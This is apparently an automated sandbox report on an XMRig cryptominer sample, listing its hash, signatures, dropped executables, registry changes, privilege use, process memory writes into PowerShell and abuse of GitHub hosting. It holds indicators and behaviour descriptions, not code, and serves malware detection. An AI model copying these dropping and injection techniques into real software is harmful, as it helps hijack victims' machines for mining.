Malware Analysis Report

2024-09-10 00:19

Sample ID 240613-kjjv7a1eqh
Target 6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe
SHA256 1bfbdabf21cbb13b96eb5c8edac83f7ec1d6e8dba09ab2c53795315664b73729
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1bfbdabf21cbb13b96eb5c8edac83f7ec1d6e8dba09ab2c53795315664b73729

Threat Level: Known bad

The file 6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

XMRig Miner payload

xmrig

Xmrig family

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Enumerates system info in registry

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 08:37

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 08:37

Reported

2024-06-13 08:40

Platform

win10v2004-20240611-en

Max time kernel

109s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\JNjawlY.exe N/A
N/A N/A C:\Windows\System\VzRiJoZ.exe N/A
N/A N/A C:\Windows\System\zkvquNG.exe N/A
N/A N/A C:\Windows\System\hkAJvxn.exe N/A
N/A N/A C:\Windows\System\ohQpMmK.exe N/A
N/A N/A C:\Windows\System\NTirKXC.exe N/A
N/A N/A C:\Windows\System\ZASDHLY.exe N/A
N/A N/A C:\Windows\System\IoPasPV.exe N/A
N/A N/A C:\Windows\System\RfZqoFO.exe N/A
N/A N/A C:\Windows\System\vXeLESQ.exe N/A
N/A N/A C:\Windows\System\YhrpLxc.exe N/A
N/A N/A C:\Windows\System\DQdwpES.exe N/A
N/A N/A C:\Windows\System\pORfgZg.exe N/A
N/A N/A C:\Windows\System\Vgtrjlz.exe N/A
N/A N/A C:\Windows\System\EMTNkDj.exe N/A
N/A N/A C:\Windows\System\rfqnVcU.exe N/A
N/A N/A C:\Windows\System\lxezhLA.exe N/A
N/A N/A C:\Windows\System\cJHRFOf.exe N/A
N/A N/A C:\Windows\System\xuaHwvm.exe N/A
N/A N/A C:\Windows\System\qNCjLsp.exe N/A
N/A N/A C:\Windows\System\ruBTdYh.exe N/A
N/A N/A C:\Windows\System\dhSpIZl.exe N/A
N/A N/A C:\Windows\System\gKtcUYG.exe N/A
N/A N/A C:\Windows\System\BCtPdAN.exe N/A
N/A N/A C:\Windows\System\FKFTSzm.exe N/A
N/A N/A C:\Windows\System\pGoRTCY.exe N/A
N/A N/A C:\Windows\System\gOrqmJB.exe N/A
N/A N/A C:\Windows\System\olMQlKv.exe N/A
N/A N/A C:\Windows\System\DTGNfwP.exe N/A
N/A N/A C:\Windows\System\fmAvSbw.exe N/A
N/A N/A C:\Windows\System\AMqpqYw.exe N/A
N/A N/A C:\Windows\System\BkmpRoh.exe N/A
N/A N/A C:\Windows\System\LkhSFoW.exe N/A
N/A N/A C:\Windows\System\BsmHOnf.exe N/A
N/A N/A C:\Windows\System\fVWTzSF.exe N/A
N/A N/A C:\Windows\System\TDziNYZ.exe N/A
N/A N/A C:\Windows\System\zxGFZum.exe N/A
N/A N/A C:\Windows\System\VFsHomq.exe N/A
N/A N/A C:\Windows\System\iHvrKSc.exe N/A
N/A N/A C:\Windows\System\iBvLcwS.exe N/A
N/A N/A C:\Windows\System\yoHotwJ.exe N/A
N/A N/A C:\Windows\System\XYwUrAU.exe N/A
N/A N/A C:\Windows\System\HqkwFGh.exe N/A
N/A N/A C:\Windows\System\EIEcLPt.exe N/A
N/A N/A C:\Windows\System\WFQCKlQ.exe N/A
N/A N/A C:\Windows\System\jUoFdnL.exe N/A
N/A N/A C:\Windows\System\yiZvGln.exe N/A
N/A N/A C:\Windows\System\rSgLWSO.exe N/A
N/A N/A C:\Windows\System\BwEicrA.exe N/A
N/A N/A C:\Windows\System\YMtkUqi.exe N/A
N/A N/A C:\Windows\System\rgikvRZ.exe N/A
N/A N/A C:\Windows\System\TZxHZJu.exe N/A
N/A N/A C:\Windows\System\UjJdmiD.exe N/A
N/A N/A C:\Windows\System\qXvnsNr.exe N/A
N/A N/A C:\Windows\System\AYqJGee.exe N/A
N/A N/A C:\Windows\System\FPMsKdj.exe N/A
N/A N/A C:\Windows\System\mvJYIbG.exe N/A
N/A N/A C:\Windows\System\VgTDxJU.exe N/A
N/A N/A C:\Windows\System\vvpaPqW.exe N/A
N/A N/A C:\Windows\System\MWIrnNw.exe N/A
N/A N/A C:\Windows\System\WXwkEpJ.exe N/A
N/A N/A C:\Windows\System\TRpPPXD.exe N/A
N/A N/A C:\Windows\System\RnEvGFv.exe N/A
N/A N/A C:\Windows\System\pEYaYrm.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\DTGNfwP.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IuQyGvZ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UtBVhyw.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HAjsBXF.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BzPYaCC.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HPwQjsA.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GHKZXuH.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BaBKObU.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JVGStcL.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\yARMyLf.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kLouUCa.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mvJYIbG.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JxrKOfa.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nWVfonB.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jaOeffQ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ixBpMNn.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PjJxlKg.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zVfNFFD.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hlHqdrn.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eBTAZvv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uGGvCDy.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vhPzMlc.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MAKBRWh.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZASDHLY.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AxmlWMt.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pWDvnoZ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cBkKOWI.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mbzWgyu.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RHvPBFO.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wzDOAtO.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hRyuKJJ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qSHwRoh.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IlbDYFN.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WFtPskY.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kxgUhfW.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RnEvGFv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmADpBr.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pLrsMWe.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GUUkhST.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tmjuQeC.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YvlAnQz.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KEIqJXn.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xMYUJsJ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\weCPyXq.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HuvpRXo.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\olMQlKv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GWkJDMc.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pIYRuYx.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XVciEkX.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fVWTzSF.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ijzMYtf.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\emvlmXw.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rIrmVCs.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GcDbgEv.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HIEcuZB.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VFsHomq.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AYqJGee.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cHHTqFO.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LMidcNe.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CxMfWph.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uqMgxNN.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TDziNYZ.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ahTDbwX.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HZicGde.exe C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2848 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2848 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\JNjawlY.exe
PID 2848 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\JNjawlY.exe
PID 2848 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\VzRiJoZ.exe
PID 2848 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\VzRiJoZ.exe
PID 2848 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\zkvquNG.exe
PID 2848 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\zkvquNG.exe
PID 2848 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\hkAJvxn.exe
PID 2848 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\hkAJvxn.exe
PID 2848 wrote to memory of 368 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ohQpMmK.exe
PID 2848 wrote to memory of 368 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ohQpMmK.exe
PID 2848 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\NTirKXC.exe
PID 2848 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\NTirKXC.exe
PID 2848 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ZASDHLY.exe
PID 2848 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ZASDHLY.exe
PID 2848 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\IoPasPV.exe
PID 2848 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\IoPasPV.exe
PID 2848 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\RfZqoFO.exe
PID 2848 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\RfZqoFO.exe
PID 2848 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\vXeLESQ.exe
PID 2848 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\vXeLESQ.exe
PID 2848 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\YhrpLxc.exe
PID 2848 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\YhrpLxc.exe
PID 2848 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DQdwpES.exe
PID 2848 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DQdwpES.exe
